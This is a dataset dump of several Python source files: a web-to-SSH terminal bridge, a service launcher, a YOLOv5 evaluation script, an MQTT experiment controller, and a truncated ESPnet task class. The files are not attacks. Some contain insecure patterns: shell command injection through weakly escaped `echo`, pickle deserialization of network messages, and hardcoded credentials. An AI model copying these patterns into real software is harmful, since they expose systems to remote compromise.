source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
aioserver.py
|
from aiohttp import web
import aiohttp
import paramiko
import threading
import aiohttp_cors
import asyncio
async def rev_send(socket):
while not socket.ws.closed:
asyncio.sleep(0.1)
try:
data = socket.shell.recv(8192)
await socket.ws.send_bytes(data)
except Exception as e:
print(type(e), str(e))
def start_loop(loop):
loop.run_forever()
def sftp_exec_command(ssh_client, command):
try:
std_in, std_out, std_err = ssh_client.exec_command(command, timeout=4)
out = "".join([line for line in std_out])
return out
except Exception as e:
print(e)
return None
async def coding(request):
data = await request.json()
code_id = data["code_id"]
code = data["code"]
host = data["host"]
port = int(data['port'])
user = data['username']
password = data['password']
# code 不转义处理
code = code.replace('"', '\\"')
ssh_client = paramiko.SSHClient()
ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh_client.connect(host, port, user, password)
sftp_exec_command(ssh_client, f"mkdir -p ~/{code_id}")
sftp_exec_command(ssh_client, f"echo \"{code}\" > ~/{code_id}/main.py")
ssh_client.close()
return web.json_response(
{"data": {"ssh_command": f"python ~/{code_id}/main.py"}, "error_code": 0, "msg": "ok"})
class WebSocketHandler(web.View, aiohttp_cors.CorsViewMixin):
async def get(self):
self.ws = web.WebSocketResponse()
await self.ws.prepare(self.request)
data = self.request.query
host = data["host"]
port = int(data['port'])
user = data['username']
password = data['password']
self.sshclient = paramiko.SSHClient()
self.sshclient.load_system_host_keys()
self.sshclient.set_missing_host_key_policy(paramiko.AutoAddPolicy())
self.sshclient.connect(host, port, user, password)
self.shell = self.sshclient.invoke_shell(term='xterm')
self.shell.settimeout(90)
self.status = True
new_loop = asyncio.new_event_loop()
t = threading.Thread(target=start_loop, args=(new_loop,))
t.start()
asyncio.run_coroutine_threadsafe(rev_send(self), new_loop)
async for msg in self.ws:
if msg.type == aiohttp.WSMsgType.TEXT:
if msg.data == 'close':
await self.ws.close()
else:
self.shell.send(msg.data)
elif msg.type == aiohttp.WSMsgType.ERROR:
print('ws connection closed with exception %s' %
self.ws.exception())
elif msg.type == aiohttp.WSMsgType.CLOSE:
break
print('websocket connection closed')
new_loop.stop()
print(t.is_alive())
return self.ws
app = web.Application()
app.router.add_routes([web.view('/terminals/', WebSocketHandler), web.post('/coding', coding), ])
cors = aiohttp_cors.setup(
app,
defaults={
"*": aiohttp_cors.ResourceOptions(
allow_credentials=True,
expose_headers="*",
allow_headers="*",
)
})
for route in list(app.router.routes()):
cors.add(route)
web.run_app(app, host="127.0.0.1", port=3000)
|
run.py
|
#!/usr/bin/python
# Standard Library
import os
import sys
import time
import subprocess
from threading import Thread
from Queue import Queue
# Third Party
import yaml
# Local
waitTime = 10
services = [
{
"name": "frontend",
"command": ["./main.py", "-e", "-d"],
"color": "1"
},
{
"name": "markcuban",
"command": ["./main.py", "-e", "-d"],
"color": "2"
},
{
"name": "jaunt",
"command": ["./main.py", "-e", "-d"],
"color": "3"
},
{
"name": "redshirt",
"command": ["./main.py", "-e", "-d"],
"color": "6"
},
{
"name": "flint",
"command": ["./main.py", "-e", "-d"],
"color": "5"
},
{
"name": "lego",
"command": ["./main.py", "-e", "-d"],
"color": "20"
},
{
"name": "wf-run",
"path": ["lego"],
"command": ["celery","-A","lib.runner","worker"],
"color": 22
}
]
def getTerminalSize():
env = os.environ
def ioctl_GWINSZ(fd):
try:
import fcntl, termios, struct, os
cr = struct.unpack('hh', fcntl.ioctl(fd, termios.TIOCGWINSZ,
'1234'))
except:
return
return cr
cr = ioctl_GWINSZ(0) or ioctl_GWINSZ(1) or ioctl_GWINSZ(2)
if not cr:
try:
fd = os.open(os.ctermid(), os.O_RDONLY)
cr = ioctl_GWINSZ(fd)
os.close(fd)
except:
pass
if not cr:
cr = (env.get('LINES', 25), env.get('COLUMNS', 80))
### Use get(key[, default]) instead of a try/catch
#try:
# cr = (env['LINES'], env['COLUMNS'])
#except:
# cr = (25, 80)
return int(cr[1]), int(cr[0])
if __name__ == "__main__":
conf = yaml.load(open("conf.yml"))
os.environ["ZKHOSTS"] = "|".join(conf["zkhosts"])
import mixingboard
for key, value in conf.items():
mixingboard.setConf(key, value)
currentDirectory = os.path.dirname(os.path.realpath(__file__))
logDirectory = os.path.join(currentDirectory, "logs")
os.environ["PYTHONPATH"] += ":%s:" % currentDirectory
try:
os.mkdir(logDirectory)
except OSError:
pass
def runService(service):
logFileName = os.path.join(logDirectory, "%s.log" % service['name'])
with open(logFileName,"a") as logFile:
baseDirectory = currentDirectory
serviceDirectory = ""
if "path" in service:
serviceDirectory = os.path.join(*([baseDirectory] + service['path']))
else:
serviceDirectory = os.path.join(baseDirectory, service['name'])
while True:
proc = subprocess.Popen(service['command'], cwd=serviceDirectory, bufsize=0,
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
print "\033[48;5;%smStarted %s...\033[0m" % (service['color'], service['name'])
while True:
nextline = proc.stdout.readline()
if nextline == '' and proc.poll() != None:
break
(width, _) = getTerminalSize()
line = "\033[48;5;%sm%s:\033[0m " % (service['color'], service['name'])
extra = 13
while True:
nextLinePos = width - (len(line) - extra)
line += nextline[:nextLinePos]
sys.stdout.write(line)
nextline = nextline[nextLinePos:]
if len(nextline) > 0:
extra = 14
line = "\n\033[48;5;%sm%s \033[0m " % (service['color'], ' '*len(service['name']))
else:
sys.stdout.write('\n')
break
sys.stdout.flush()
logFile.write(nextline)
logFile.flush()
print "\033[48;5;%smProcess %s exited. Waiting %s seconds and restarting\033[0m" % (
service['color'],
service['name'],
waitTime
)
time.sleep(waitTime)
for service in services:
t = Thread(target=runService, args=(service,))
t.daemon = True
t.start()
time.sleep(0.5)
while True:
try:
time.sleep(10)
except:
sys.exit(0)
|
test.py
|
import argparse
import json
import os
from pathlib import Path
from threading import Thread
import numpy as np
import torch
import yaml
from tqdm import tqdm
from models.experimental import attempt_load
from utils.datasets import create_dataloader
from utils.general import coco80_to_coco91_class, check_dataset, check_file, check_img_size, check_requirements, \
box_iou, non_max_suppression, scale_coords, xyxy2xywh, xywh2xyxy, set_logging, increment_path, colorstr
from utils.metrics import ap_per_class, ConfusionMatrix
from utils.plots import plot_images, output_to_target, plot_study_txt
from utils.torch_utils import select_device, time_synchronized
@torch.no_grad()
def test(data,
weights=None,
batch_size=32,
imgsz=640,
conf_thres=0.001,
iou_thres=0.6, # for NMS
save_json=False,
single_cls=False,
augment=False,
verbose=False,
model=None,
dataloader=None,
save_dir=Path(''), # for saving images
save_txt=False, # for auto-labelling
save_hybrid=False, # for hybrid auto-labelling
save_conf=False, # save auto-label confidences
plots=True,
wandb_logger=None,
compute_loss=None,
half_precision=True,
is_coco=False,
opt=None):
# Initialize/load model and set device
training = model is not None
if training: # called by train.py
device = next(model.parameters()).device # get model device
else: # called directly
set_logging()
device = select_device(opt.device, batch_size=batch_size)
# Directories
save_dir = increment_path(Path(opt.project) / opt.name, exist_ok=opt.exist_ok) # increment run
(save_dir / 'labels' if save_txt else save_dir).mkdir(parents=True, exist_ok=True) # make dir
# Load model
model = attempt_load(weights, map_location=device) # load FP32 model
gs = max(int(model.stride.max()), 32) # grid size (max stride)
imgsz = check_img_size(imgsz, s=gs) # check img_size
# Multi-GPU disabled, incompatible with .half() https://github.com/ultralytics/yolov5/issues/99
# if device.type != 'cpu' and torch.cuda.device_count() > 1:
# model = nn.DataParallel(model)
# Half
half = device.type != 'cpu' and half_precision # half precision only supported on CUDA
if half:
model.half()
# Configure
model.eval()
if isinstance(data, str):
is_coco = data.endswith('coco.yaml')
with open(data) as f:
data = yaml.safe_load(f)
check_dataset(data) # check
nc = 1 if single_cls else int(data['nc']) # number of classes
iouv = torch.linspace(0.5, 0.95, 10).to(device) # iou vector for mAP@0.5:0.95
niou = iouv.numel()
# Logging
log_imgs = 0
if wandb_logger and wandb_logger.wandb:
log_imgs = min(wandb_logger.log_imgs, 100)
# Dataloader
if not training:
if device.type != 'cpu':
model(torch.zeros(1, 3, imgsz, imgsz).to(device).type_as(next(model.parameters()))) # run once
task = opt.task if opt.task in ('train', 'val', 'test') else 'val' # path to train/val/test images
dataloader = create_dataloader(data[task], imgsz, batch_size, gs, opt, pad=0.5, rect=True,
prefix=colorstr(f'{task}: '))[0]
seen = 0
confusion_matrix = ConfusionMatrix(nc=nc)
names = {k: v for k, v in enumerate(model.names if hasattr(model, 'names') else model.module.names)}
coco91class = coco80_to_coco91_class()
s = ('%20s' + '%11s' * 6) % ('Class', 'Images', 'Labels', 'P', 'R', 'mAP@.5', 'mAP@.5:.95')
p, r, f1, mp, mr, map50, map, t0, t1 = 0., 0., 0., 0., 0., 0., 0., 0., 0.
loss = torch.zeros(3, device=device)
jdict, stats, ap, ap_class, wandb_images = [], [], [], [], []
for batch_i, (img, targets, paths, shapes) in enumerate(tqdm(dataloader, desc=s)):
img = img.to(device, non_blocking=True)
img = img.half() if half else img.float() # uint8 to fp16/32
img /= 255.0 # 0 - 255 to 0.0 - 1.0
targets = targets.to(device)
nb, _, height, width = img.shape # batch size, channels, height, width
# Run model
t = time_synchronized()
out, train_out = model(img, augment=augment) # inference and training outputs
t0 += time_synchronized() - t
# Compute loss
if compute_loss:
loss += compute_loss([x.float() for x in train_out], targets)[1][:3] # box, obj, cls
# Run NMS
targets[:, 2:] *= torch.Tensor([width, height, width, height]).to(device) # to pixels
lb = [targets[targets[:, 0] == i, 1:] for i in range(nb)] if save_hybrid else [] # for autolabelling
t = time_synchronized()
out = non_max_suppression(out, conf_thres, iou_thres, labels=lb, multi_label=True, agnostic=single_cls)
t1 += time_synchronized() - t
# Statistics per image
for si, pred in enumerate(out):
labels = targets[targets[:, 0] == si, 1:]
nl = len(labels)
tcls = labels[:, 0].tolist() if nl else [] # target class
path = Path(paths[si])
seen += 1
if len(pred) == 0:
if nl:
stats.append((torch.zeros(0, niou, dtype=torch.bool), torch.Tensor(), torch.Tensor(), tcls))
continue
# Predictions
if single_cls:
pred[:, 5] = 0
predn = pred.clone()
scale_coords(img[si].shape[1:], predn[:, :4], shapes[si][0], shapes[si][1]) # native-space pred
# Append to text file
if save_txt:
gn = torch.tensor(shapes[si][0])[[1, 0, 1, 0]] # normalization gain whwh
for *xyxy, conf, cls in predn.tolist():
xywh = (xyxy2xywh(torch.tensor(xyxy).view(1, 4)) / gn).view(-1).tolist() # normalized xywh
line = (cls, *xywh, conf) if save_conf else (cls, *xywh) # label format
with open(save_dir / 'labels' / (path.stem + '.txt'), 'a') as f:
f.write(('%g ' * len(line)).rstrip() % line + '\n')
# W&B logging - Media Panel Plots
if len(wandb_images) < log_imgs and wandb_logger.current_epoch > 0: # Check for test operation
if wandb_logger.current_epoch % wandb_logger.bbox_interval == 0:
box_data = [{"position": {"minX": xyxy[0], "minY": xyxy[1], "maxX": xyxy[2], "maxY": xyxy[3]},
"class_id": int(cls),
"box_caption": "%s %.3f" % (names[cls], conf),
"scores": {"class_score": conf},
"domain": "pixel"} for *xyxy, conf, cls in pred.tolist()]
boxes = {"predictions": {"box_data": box_data, "class_labels": names}} # inference-space
wandb_images.append(wandb_logger.wandb.Image(img[si], boxes=boxes, caption=path.name))
wandb_logger.log_training_progress(predn, path, names) if wandb_logger and wandb_logger.wandb_run else None
# Append to pycocotools JSON dictionary
if save_json:
# [{"image_id": 42, "category_id": 18, "bbox": [258.15, 41.29, 348.26, 243.78], "score": 0.236}, ...
image_id = int(path.stem) if path.stem.isnumeric() else path.stem
box = xyxy2xywh(predn[:, :4]) # xywh
box[:, :2] -= box[:, 2:] / 2 # xy center to top-left corner
for p, b in zip(pred.tolist(), box.tolist()):
jdict.append({'image_id': image_id,
'category_id': coco91class[int(p[5])] if is_coco else int(p[5]),
'bbox': [round(x, 3) for x in b],
'score': round(p[4], 5)})
# Assign all predictions as incorrect
correct = torch.zeros(pred.shape[0], niou, dtype=torch.bool, device=device)
if nl:
detected = [] # target indices
tcls_tensor = labels[:, 0]
# target boxes
tbox = xywh2xyxy(labels[:, 1:5])
scale_coords(img[si].shape[1:], tbox, shapes[si][0], shapes[si][1]) # native-space labels
if plots:
confusion_matrix.process_batch(predn, torch.cat((labels[:, 0:1], tbox), 1))
# Per target class
for cls in torch.unique(tcls_tensor):
ti = (cls == tcls_tensor).nonzero(as_tuple=False).view(-1) # target indices
pi = (cls == pred[:, 5]).nonzero(as_tuple=False).view(-1) # prediction indices
# Search for detections
if pi.shape[0]:
# Prediction to target ious
ious, i = box_iou(predn[pi, :4], tbox[ti]).max(1) # best ious, indices
# Append detections
detected_set = set()
for j in (ious > iouv[0]).nonzero(as_tuple=False):
d = ti[i[j]] # detected target
if d.item() not in detected_set:
detected_set.add(d.item())
detected.append(d)
correct[pi[j]] = ious[j] > iouv # iou_thres is 1xn
if len(detected) == nl: # all targets already located in image
break
# Append statistics (correct, conf, pcls, tcls)
stats.append((correct.cpu(), pred[:, 4].cpu(), pred[:, 5].cpu(), tcls))
# Plot images
if plots and batch_i < 3:
f = save_dir / f'test_batch{batch_i}_labels.jpg' # labels
Thread(target=plot_images, args=(img, targets, paths, f, names), daemon=True).start()
f = save_dir / f'test_batch{batch_i}_pred.jpg' # predictions
Thread(target=plot_images, args=(img, output_to_target(out), paths, f, names), daemon=True).start()
# Compute statistics
stats = [np.concatenate(x, 0) for x in zip(*stats)] # to numpy
if len(stats) and stats[0].any():
p, r, ap, f1, ap_class = ap_per_class(*stats, plot=plots, save_dir=save_dir, names=names)
ap50, ap = ap[:, 0], ap.mean(1) # AP@0.5, AP@0.5:0.95
mp, mr, map50, map = p.mean(), r.mean(), ap50.mean(), ap.mean()
nt = np.bincount(stats[3].astype(np.int64), minlength=nc) # number of targets per class
else:
nt = torch.zeros(1)
# Print results
pf = '%20s' + '%11i' * 2 + '%11.3g' * 4 # print format
print(pf % ('all', seen, nt.sum(), mp, mr, map50, map))
# Print results per class
if (verbose or (nc < 50 and not training)) and nc > 1 and len(stats):
for i, c in enumerate(ap_class):
print(pf % (names[c], seen, nt[c], p[i], r[i], ap50[i], ap[i]))
# Print speeds
t = tuple(x / seen * 1E3 for x in (t0, t1, t0 + t1)) + (imgsz, imgsz, batch_size) # tuple
if not training:
print('Speed: %.1f/%.1f/%.1f ms inference/NMS/total per %gx%g image at batch-size %g' % t)
# Plots
if plots:
confusion_matrix.plot(save_dir=save_dir, names=list(names.values()))
if wandb_logger and wandb_logger.wandb:
val_batches = [wandb_logger.wandb.Image(str(f), caption=f.name) for f in sorted(save_dir.glob('test*.jpg'))]
wandb_logger.log({"Validation": val_batches})
if wandb_images:
wandb_logger.log({"Bounding Box Debugger/Images": wandb_images})
# Save JSON
if save_json and len(jdict):
w = Path(weights[0] if isinstance(weights, list) else weights).stem if weights is not None else '' # weights
anno_json = '../coco/annotations/instances_val2017.json' # annotations json
pred_json = str(save_dir / f"{w}_predictions.json") # predictions json
print('\nEvaluating pycocotools mAP... saving %s...' % pred_json)
with open(pred_json, 'w') as f:
json.dump(jdict, f)
try: # https://github.com/cocodataset/cocoapi/blob/master/PythonAPI/pycocoEvalDemo.ipynb
from pycocotools.coco import COCO
from pycocotools.cocoeval import COCOeval
anno = COCO(anno_json) # init annotations api
pred = anno.loadRes(pred_json) # init predictions api
eval = COCOeval(anno, pred, 'bbox')
if is_coco:
eval.params.imgIds = [int(Path(x).stem) for x in dataloader.dataset.img_files] # image IDs to evaluate
eval.evaluate()
eval.accumulate()
eval.summarize()
map, map50 = eval.stats[:2] # update results (mAP@0.5:0.95, mAP@0.5)
except Exception as e:
print(f'pycocotools unable to run: {e}')
# Return results
model.float() # for training
if not training:
s = f"\n{len(list(save_dir.glob('labels/*.txt')))} labels saved to {save_dir / 'labels'}" if save_txt else ''
print(f"Results saved to {save_dir}{s}")
maps = np.zeros(nc) + map
for i, c in enumerate(ap_class):
maps[c] = ap[i]
return (mp, mr, map50, map, *(loss.cpu() / len(dataloader)).tolist()), maps, t
if __name__ == '__main__':
parser = argparse.ArgumentParser(prog='test.py')
parser.add_argument('--weights', nargs='+', type=str, default='yolov5s.pt', help='model.pt path(s)')
parser.add_argument('--data', type=str, default='data/coco128.yaml', help='*.data path')
parser.add_argument('--batch-size', type=int, default=32, help='size of each image batch')
parser.add_argument('--img-size', type=int, default=640, help='inference size (pixels)')
parser.add_argument('--conf-thres', type=float, default=0.001, help='object confidence threshold')
parser.add_argument('--iou-thres', type=float, default=0.6, help='IOU threshold for NMS')
parser.add_argument('--task', default='val', help='train, val, test, speed or study')
parser.add_argument('--device', default='', help='cuda device, i.e. 0 or 0,1,2,3 or cpu')
parser.add_argument('--single-cls', action='store_true', help='treat as single-class dataset')
parser.add_argument('--augment', action='store_true', help='augmented inference')
parser.add_argument('--verbose', action='store_true', help='report mAP by class')
parser.add_argument('--save-txt', action='store_true', help='save results to *.txt')
parser.add_argument('--save-hybrid', action='store_true', help='save label+prediction hybrid results to *.txt')
parser.add_argument('--save-conf', action='store_true', help='save confidences in --save-txt labels')
parser.add_argument('--save-json', action='store_true', help='save a cocoapi-compatible JSON results file')
parser.add_argument('--project', default='runs/test', help='save to project/name')
parser.add_argument('--name', default='exp', help='save to project/name')
parser.add_argument('--exist-ok', action='store_true', help='existing project/name ok, do not increment')
parser.add_argument('--half', type=bool, default=False, help='use FP16 half-precision inference')
opt = parser.parse_args()
opt.save_json |= opt.data.endswith('coco.yaml')
opt.data = check_file(opt.data) # check file
print(opt)
check_requirements(exclude=('tensorboard', 'pycocotools', 'thop'))
if opt.task in ('train', 'val', 'test'): # run normally
test(opt.data,
opt.weights,
opt.batch_size,
opt.img_size,
opt.conf_thres,
opt.iou_thres,
opt.save_json,
opt.single_cls,
opt.augment,
opt.verbose,
save_txt=opt.save_txt | opt.save_hybrid,
save_hybrid=opt.save_hybrid,
save_conf=opt.save_conf,
half_precision=opt.half,
opt=opt
)
elif opt.task == 'speed': # speed benchmarks
for w in opt.weights:
test(opt.data, w, opt.batch_size, opt.img_size, 0.25, 0.45, save_json=False, plots=False, opt=opt)
elif opt.task == 'study': # run over a range of settings and save/plot
# python test.py --task study --data coco.yaml --iou 0.7 --weights yolov5s.pt yolov5m.pt yolov5l.pt yolov5x.pt
x = list(range(256, 1536 + 128, 128)) # x axis (image sizes)
for w in opt.weights:
f = f'study_{Path(opt.data).stem}_{Path(w).stem}.txt' # filename to save to
y = [] # y axis
for i in x: # img-size
print(f'\nRunning {f} point {i}...')
r, _, t = test(opt.data, w, opt.batch_size, i, opt.conf_thres, opt.iou_thres, opt.save_json,
plots=False, opt=opt)
y.append(r + t) # results and times
np.savetxt(f, y, fmt='%10.4g') # save
os.system('zip -r study.zip study_*.txt')
plot_study_txt(x=x) # plot
|
control.py
|
import pickle
import paho.mqtt.client as mqtt
from threading import Thread
import time
import os
# algorithm imports
mec_nodes = {}
class BrokerCom:
def __init__(self, user, pw, ip, sub_topic):
self.user = user
self.pw = pw
self.ip = ip
self.port = 1883
self.topic = sub_topic
self.client = mqtt.Client()
self.stopped = set()
self.finished = set()
self.run = 1
def on_connect(self, connect_client, userdata, flags, rc):
print("Connected with Code :" + str(rc))
# Subscribe Topic from here
connect_client.subscribe(self.topic)
def on_message(self, message_client, userdata, msg): # ['start', {hostname: ip}, algo_no, cloud_ip, send_path ]
data = pickle.loads(msg.payload) # ['start', {hostname: ip, ...}, algo_no], ['stop': ip]
print(msg.topic, data)
if (data[0] == 'stop') and (data[1] not in self.stopped):
self.stopped.add(data[1])
print(f'{data[1]} has stopped!')
elif data[0] == 'about':
mec_nodes.update(data[1])
print(data[1])
elif data[0] == 'client finish':
self.finished.add(data[1])
print(f'client finish: {data[1]}')
def publish(self, topic, data):
self.client.publish(topic, data)
def broker_loop(self):
self.client.on_connect = self.on_connect
self.client.on_message = self.on_message
self.client.username_pw_set(self.user, self.pw)
self.client.connect(self.ip, self.port, 60)
self.client.loop_start()
while True:
if self.run == 0:
self.client.loop_stop()
self.client.disconnect()
print('broker loop stopped!')
break
def __del__(self):
print('Broker Communication Object Deleted!')
def mec_id(client_ip):
_id = client_ip.split('.')[-1]
if len(_id) == 1:
return '00' + _id
elif len(_id) == 2:
return '0' + _id
else:
return _id
"""
{'mec-9': '192.168.122.119', 'mec-8': '192.168.122.118', 'mec-7': '192.168.122.117', 'mec-6': '192.168.122.116', 'mec-5': '192.168.122.115', 'mec-4': '192.168.122.114', 'mec-3': '192.168.122.113', 'mec-2': '192.168.122.112', 'mec-1': '192.168.122.111', 'osboxes-0': '192.168.122.110'}
"""
def exp_control():
global messenger
broker_dict = {'user': 'mec', 'pw': 'password', 'sub_topic': 'control/control', 'ip': '192.168.122.111'}
algos = [i for i in range(1,7)]
algo_nos = {1: 2, 2: 3, 3: 7, 4: 10, 5: 12, 6: 16}
exp_no = [4, 7, 10]
exp_type = ['homo', 'hetero']
cloud_ips = ['192.168.200.11', '192.168.200.12']
counter = 3
messenger = BrokerCom(**broker_dict)
h1 = Thread(target=messenger.broker_loop)
h1.start()
print('please start all other servers before you continue')
input('start: ')
print('hosts: ', mec_nodes)
s_hosts = sorted({i:mec_nodes[i] for i in mec_nodes if i != 'osboxes-0'})
for count in range(1, counter+1):
for kind in exp_type:
for algo_no in algos:
for mec_no in exp_no:
hosts = {i: mec_nodes[i] for i in s_hosts[:mec_no-1]}
hosts['osboxes-0'] = mec_nodes['osboxes-0']
h_list = list(hosts)
cloud_dict = {h_list[i]: cloud_ips[i%2] for i in range(len(h_list))}
send_path = f'/home/mec/result/{kind}/{count}'
data_mec = ['start', hosts, algo_no, cloud_dict, send_path]
# data = '' # # ['start', {hostname: ip}, algo_no, cloud_ip, send_path ]
print('initializing Edge nodes')
messenger.publish(topic='control/mec', data=pickle.dumps(data_mec))
data_client = ['start', hosts, algo_nos[algo_no], kind, send_path]
# ['start', {hostname: ip}, algo_id, homo/hetero, send_path]
time.sleep(20)
print('initializing Client Nodes')
messenger.publish(topic='control/client', data=pickle.dumps(data_client))
print(f'Experiment {mec_no} for {kind} has commenced!')
while len(messenger.finished) != 3:
time.sleep(60)
# messenger.publish('control/mec', pickle.dumps(['keep alive', 'mec']))
print('client is finished!')
messenger.finished = set()
time.sleep(3*60)
print('stopping edge nodes')
# messenger.publish(topic='control/mec', data=pickle.dumps(['stop', hosts]))
for host_ip in hosts.values():
messenger.publish(topic=mec_id(host_ip), data='stop')
while len(messenger.stopped) != mec_no:
time.sleep(10)
print('edge nodes are stopped!')
messenger.stopped = set()
print('stopping clients')
clients = ['124', '125', '126']
for client in clients:
messenger.publish(topic=client, data=str(['stop']))
print(f'Experiment {mec_no} for {kind} is concluded!')
print('Waiting for 60 seconds Time Lapse!')
time.sleep(60)
messenger.run = 0
print('All Experiments has been Concluded!')
if __name__ == '__main__':
os.system('clear')
try:
exp_control()
except KeyboardInterrupt:
print('killed')
messenger.run = 0
|
abs_task.py
|
from abc import ABC
from abc import abstractmethod
import argparse
from distutils.version import LooseVersion
import functools
import logging
import os
from pathlib import Path
import sys
from typing import Any
from typing import Callable
from typing import Dict
from typing import List
from typing import Optional
from typing import Sequence
from typing import Tuple
from typing import Union
import humanfriendly
import numpy as np
import torch
import torch.multiprocessing
import torch.nn
import torch.optim
from torch.utils.data import DataLoader
from typeguard import check_argument_types
from typeguard import check_return_type
import yaml
from espnet.utils.cli_utils import get_commandline_args
from espnet2.iterators.abs_iter_factory import AbsIterFactory
from espnet2.iterators.chunk_iter_factory import ChunkIterFactory
from espnet2.iterators.multiple_iter_factory import MultipleIterFactory
from espnet2.iterators.sequence_iter_factory import SequenceIterFactory
from espnet2.main_funcs.average_nbest_models import average_nbest_models
from espnet2.main_funcs.collect_stats import collect_stats
from espnet2.optimizers.sgd import SGD
from espnet2.samplers.build_batch_sampler import BATCH_TYPES
from espnet2.samplers.build_batch_sampler import build_batch_sampler
from espnet2.samplers.unsorted_batch_sampler import UnsortedBatchSampler
from espnet2.schedulers.abs_scheduler import AbsScheduler
from espnet2.schedulers.noam_lr import NoamLR
from espnet2.schedulers.warmup_lr import WarmupLR
from espnet2.torch_utils.load_pretrained_model import load_pretrained_model
from espnet2.torch_utils.model_summary import model_summary
from espnet2.torch_utils.pytorch_version import pytorch_cudnn_version
from espnet2.torch_utils.set_all_random_seed import set_all_random_seed
from espnet2.train.abs_espnet_model import AbsESPnetModel
from espnet2.train.class_choices import ClassChoices
from espnet2.train.dataset import DATA_TYPES
from espnet2.train.dataset import ESPnetDataset
from espnet2.train.distributed_utils import DistributedOption
from espnet2.train.distributed_utils import free_port
from espnet2.train.distributed_utils import get_master_port
from espnet2.train.distributed_utils import get_node_rank
from espnet2.train.distributed_utils import get_num_nodes
from espnet2.train.distributed_utils import resolve_distributed_mode
from espnet2.train.iterable_dataset import IterableESPnetDataset
from espnet2.train.reporter import Reporter
from espnet2.train.trainer import Trainer
from espnet2.utils.build_dataclass import build_dataclass
from espnet2.utils import config_argparse
from espnet2.utils.get_default_kwargs import get_default_kwargs
from espnet2.utils.nested_dict_action import NestedDictAction
from espnet2.utils.types import humanfriendly_parse_size_or_none
from espnet2.utils.types import int_or_none
from espnet2.utils.types import str2bool
from espnet2.utils.types import str2triple_str
from espnet2.utils.types import str_or_int
from espnet2.utils.types import str_or_none
from espnet2.utils.yaml_no_alias_safe_dump import yaml_no_alias_safe_dump
if LooseVersion(torch.__version__) >= LooseVersion("1.5.0"):
from torch.multiprocessing.spawn import ProcessContext
else:
from torch.multiprocessing.spawn import SpawnContext as ProcessContext
optim_classes = dict(
adam=torch.optim.Adam,
sgd=SGD,
adadelta=torch.optim.Adadelta,
adagrad=torch.optim.Adagrad,
adamax=torch.optim.Adamax,
asgd=torch.optim.ASGD,
lbfgs=torch.optim.LBFGS,
rmsprop=torch.optim.RMSprop,
rprop=torch.optim.Rprop,
)
if LooseVersion(torch.__version__) >= LooseVersion("1.2.0"):
optim_classes["adamw"] = torch.optim.AdamW
try:
import torch_optimizer
optim_classes.update(
accagd=torch_optimizer.AccSGD,
adabound=torch_optimizer.AdaBound,
adamod=torch_optimizer.AdaMod,
diffgrad=torch_optimizer.DiffGrad,
lamb=torch_optimizer.Lamb,
novograd=torch_optimizer.NovoGrad,
pid=torch_optimizer.PID,
# torch_optimizer<=0.0.1a10 doesn't support
# qhadam=torch_optimizer.QHAdam,
qhm=torch_optimizer.QHM,
radam=torch_optimizer.RAdam,
sgdw=torch_optimizer.SGDW,
yogi=torch_optimizer.Yogi,
)
del torch_optimizer
except ImportError:
pass
try:
import apex
optim_classes.update(
fusedadam=apex.optimizers.FusedAdam,
fusedlamb=apex.optimizers.FusedLAMB,
fusednovograd=apex.optimizers.FusedNovoGrad,
fusedsgd=apex.optimizers.FusedSGD,
)
del apex
except ImportError:
pass
scheduler_classes = dict(
ReduceLROnPlateau=torch.optim.lr_scheduler.ReduceLROnPlateau,
lambdalr=torch.optim.lr_scheduler.LambdaLR,
steplr=torch.optim.lr_scheduler.StepLR,
multisteplr=torch.optim.lr_scheduler.MultiStepLR,
exponentiallr=torch.optim.lr_scheduler.ExponentialLR,
CosineAnnealingLR=torch.optim.lr_scheduler.CosineAnnealingLR,
)
if LooseVersion(torch.__version__) >= LooseVersion("1.1.0"):
scheduler_classes.update(
noamlr=NoamLR, warmuplr=WarmupLR,
)
if LooseVersion(torch.__version__) >= LooseVersion("1.3.0"):
CosineAnnealingWarmRestarts = torch.optim.lr_scheduler.CosineAnnealingWarmRestarts
scheduler_classes.update(
cycliclr=torch.optim.lr_scheduler.CyclicLR,
onecyclelr=torch.optim.lr_scheduler.OneCycleLR,
CosineAnnealingWarmRestarts=CosineAnnealingWarmRestarts,
)
# To lower keys
optim_classes = {k.lower(): v for k, v in optim_classes.items()}
scheduler_classes = {k.lower(): v for k, v in scheduler_classes.items()}
class AbsTask(ABC):
# Use @staticmethod, or @classmethod,
# instead of instance method to avoid God classes
# If you need more than one optimizers, change this value in inheritance
num_optimizers: int = 1
trainer = Trainer
class_choices_list: List[ClassChoices] = []
def __init__(self):
raise RuntimeError("This class can't be instantiated.")
@classmethod
@abstractmethod
def add_task_arguments(cls, parser: argparse.ArgumentParser):
pass
@classmethod
@abstractmethod
def build_collate_fn(
cls, args: argparse.Namespace
) -> Callable[[Sequence[Dict[str, np.ndarray]]], Dict[str, torch.Tensor]]:
"""Return "collate_fn", which is a callable object and given to DataLoader.
>>> from torch.utils.data import DataLoader
>>> loader = DataLoader(collate_fn=cls.build_collate_fn(args), ...)
In many cases, you can use our common collate_fn.
"""
raise NotImplementedError
@classmethod
@abstractmethod
def build_preprocess_fn(
cls, args: argparse.Namespace, train: bool
) -> Optional[Callable[[str, Dict[str, np.array]], Dict[str, np.ndarray]]]:
raise NotImplementedError
@classmethod
@abstractmethod
def required_data_names(cls, inference: bool = False) -> Tuple[str, ...]:
"""Define the required names by Task
This function is used by
>>> cls.check_task_requirements()
If your model is defined as following,
>>> from espnet2.train.abs_espnet_model import AbsESPnetModel
>>> class Model(AbsESPnetModel):
... def forward(self, input, output, opt=None): pass
then "required_data_names" should be as
>>> required_data_names = ('input', 'output')
"""
raise NotImplementedError
@classmethod
@abstractmethod
def optional_data_names(cls, inference: bool = False) -> Tuple[str, ...]:
"""Define the optional names by Task
This function is used by
>>> cls.check_task_requirements()
If your model is defined as following,
>>> from espnet2.train.abs_espnet_model import AbsESPnetModel
>>> class Model(AbsESPnetModel):
... def forward(self, input, output, opt=None): pass
then "optional_data_names" should be as
>>> optional_data_names = ('opt',)
"""
raise NotImplementedError
@classmethod
@abstractmethod
def build_model(cls, args: argparse.Namespace) -> AbsESPnetModel:
raise NotImplementedError
@classmethod
def get_parser(cls) -> config_argparse.ArgumentParser:
assert check_argument_types()
class ArgumentDefaultsRawTextHelpFormatter(
argparse.RawTextHelpFormatter, argparse.ArgumentDefaultsHelpFormatter,
):
pass
parser = config_argparse.ArgumentParser(
description="base parser",
